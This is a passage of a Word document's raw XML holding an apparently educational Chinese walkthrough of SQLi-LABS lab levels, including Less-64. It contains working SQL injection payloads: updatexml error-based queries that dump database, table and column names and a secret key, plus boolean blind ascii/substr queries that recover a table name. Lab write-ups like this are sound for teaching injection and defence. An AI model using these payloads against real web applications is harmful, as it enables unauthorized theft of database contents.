          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取当前表所有列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D196358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ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="both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选择column_name字段获取列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3AB06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ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="both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从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'ycaamd115w'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查询information_schema.columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC22AF1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3947160" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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4716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EB3406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得到列名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’secret_0HBY’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588CC15F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</w:p>
    <w:p w14:paraId="4B884A3E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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id=1 and updatexml(1,concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,(select group_concat(secret_0HBY) from challenges.43k16pht7z)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>),1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--+获取列对应秘钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD7BAEA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center"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4199890" cy="1710055"/>
            <wp:effectExtent l="0" t="0" r="3810" b="444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99890" cy="171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97F9FE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得到秘钥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’POnnerpYG0nbFnIUqi90zYWq’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833559D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</w:p>
    <w:p w14:paraId="638CB7F0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输入进提交框中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC5F3E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center"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4822825" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="317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22825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125D80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</w:pPr>
    </w:p>
    <w:p w14:paraId="7ED25DB1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</w:pP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0"/>
        <w:gridCol w:w="5331"/>
        <w:gridCol w:w="2007"/>
      </w:tblGrid>
      <w:tr w14:paraId="35B91F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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="2499A21E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i w:val="0"/>
                <w:color w:val="FFFFFF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>尝试次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="00E01751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i w:val="0"/>
                <w:color w:val="FFFFFF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="479101EF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="36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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="338B0A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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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4B2DDEB4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>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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73107388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>?Id=1</w:t>
            </w:r>
            <w:r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  <w:t>’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16D6A2CA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探测报错信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="700E60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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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64A2E062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>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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3C943714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?id=1 and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>updatexml(1,concat(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0x7e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,(database())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,0x7e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C8484CC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获取数据库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D43F5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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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74D1D022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>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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35245774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?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50CF7F41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获取当前库所有表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78CA54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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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49BF8FAC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>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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05CCB49E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?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>43k16pht7z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>'),0x7e),1)#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6030EC08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>获取当前表所有列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="319624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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="50BCD8A6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>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="09B80C84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?id=1 and updatexml(1,concat(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0x7e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,(select group_concat(secret_0HBY) from challenges.43k16pht7z)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,0x7e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="44126C6A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获取列对应秘钥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B80F01D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</w:p>
    <w:p w14:paraId="3A341458">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQLi-LABS-Less-64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58876D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使用?id=1查看正确回显</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3E437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center"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3530600" cy="2101850"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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30600" cy="210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4DCA5E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</w:pPr>
    </w:p>
    <w:p w14:paraId="7E9B12D3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依次尝试?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--+ ?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--+ ?id=1)--+等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E919FED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center"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3416300" cy="2025650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350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16300" cy="202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902246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尝试出?id=1))--+能够正确回显，无法使用报错注入，有效回显有用信息，无法使用union注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>只能使用boolean注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03728912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</w:p>
    <w:p w14:paraId="47A87454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数据库名称为challenges在题干中给出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E2F34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尝试?id=1)) and length(database())=10--+得出数据库的长度确实为10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD553DC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尝试?id=1)) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>substr(database(),1,1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)=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>challenges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--+得出数据库名字确实为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>challenges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A80E4D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5271135" cy="2519680"/>
            <wp:effectExtent l="0" t="0" r="12065" b="7620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C3B163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</w:p>
    <w:p w14:paraId="25CFC9CF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之后找出challenge数据库里第一个表名长度?id=1)) and length(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(select table_name from information_schema.tables where table_schema='challenges' limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)=10--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6A4D5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直接一次第一个表名成功找出长度为10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22CE73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1164590"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810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16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5530F0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</w:p>
    <w:p w14:paraId="6BF7BB0C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接下来通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id=1)) and ((ascii(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">((select table_name from information_schema.tables where table_schema='challenges' limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1)))&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+依次二分手注得出每一位ascii码值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C61755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第一位ascii码值:52 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C728F03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第二位ascii码值:116 t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F994A19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第三位ascii码值:122 z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B899E2A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第四位ascii码值:56 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F2B33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第五位ascii码值:120 x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B93B33F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第六位ascii码值:101 e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DFEAA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第七位ascii码值:101 e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E1CAA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第八位ascii码值:121 y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B25D2B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第九位ascii码值:109 m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8D287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第十位ascii码值:122 z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C849D0D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3683000" cy="1911350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350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683000" cy="191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9671E5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得出表名4tz8xeeymz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF563C8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</w:p>
    <w:p w14:paraId="44D2BD92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通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id=1)) and ((ascii(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">((select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from information_schema.columns where table_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4tz8xeeymz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1)))&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+依次二分手注得出每一位ascii码值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BB986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通过改变n=0,1,2,3得出有四个列，即四个用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A8AF9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但是目前已经使用了90余次尝试机会，剩余30次不足以爆破出四个列名称以及对应密码码值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B3602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探测一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id=1)) and ((ascii(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">((select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
